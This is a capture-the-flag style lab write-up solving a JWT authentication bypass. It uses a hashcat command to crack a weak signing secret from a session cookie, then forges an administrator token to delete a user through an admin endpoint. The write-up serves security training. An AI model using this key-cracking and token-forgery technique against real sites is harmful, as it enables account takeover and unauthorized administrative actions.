22.3 Lab: JWT authentication bypass via weak signing key
This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets. To solve the lab, first brute-force the website’s secret key. Once you’ve obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin, then delete the user carlos | Karthikeyan Nagaraj
Description
This lab uses a JWT-based mechanism for handling sessions. It uses an extremely weak secret key to both sign and verify tokens. This can be easily brute-forced using a wordlist of common secrets.
To solve the lab, first brute-force the website’s secret key. Once you’ve obtained this, use it to sign a modified session token that gives you access to the admin panel at /admin
, then delete the user carlos
.
You can log in to your own account using the following credentials: wiener:peter
Tip
We recommend familiarizing yourself with how to work with JWTs in Burp Suite before attempting this lab.
We also recommend using hashcat to brute-force the secret key. For details on how to do this, see Brute forcing secret keys using hashcat.
Solution
Part 1 — Brute-force the secret key
- Turn on Proxy on the browser and turn off the Intercept in Burp and move to http history.
- Log in to your account.
- Send the
GET /my-account?id=wiener
request to the repeater. - Copy the JWT session cookie, open a terminal, and paste the following command which incorporates hashcat to crack the secret key.
hashcat -a 0 -m 16500 “JWT_COOKIE” /usr/share/seclists/Passwords/scraped-JWT-secrets.txt
- If everything works correctly, this should reveal that the weak secret is
secret1
.
Part 2— Modify and sign the JWT
- Go to https://jwt.io and paste the JWT cookie that we copied from the repeater.
- In the Payload box, change the value of the sub from
wiener
toadministrator
- In the Verify-Signature box, paste the key
secret1
or any other key that you cracked from hashcat in “your-256-bit-secret”. - Now, copy the final JWT cookie on the left and go to the repeater.
- Change the path to
/admin/delete?username=carlos
and replace the JWT cookie with the one that we copied from jwt.io - Send the request and the Lab will be solved.
A YouTube Channel for Cybersecurity Lab’s Poc and Write-ups
Telegram Channel for Free Ethical Hacking Dumps
Thank you for Reading!
Happy Ethical Hacking ~
Author: Karthikeyan Nagaraj ~ Cyberw1ng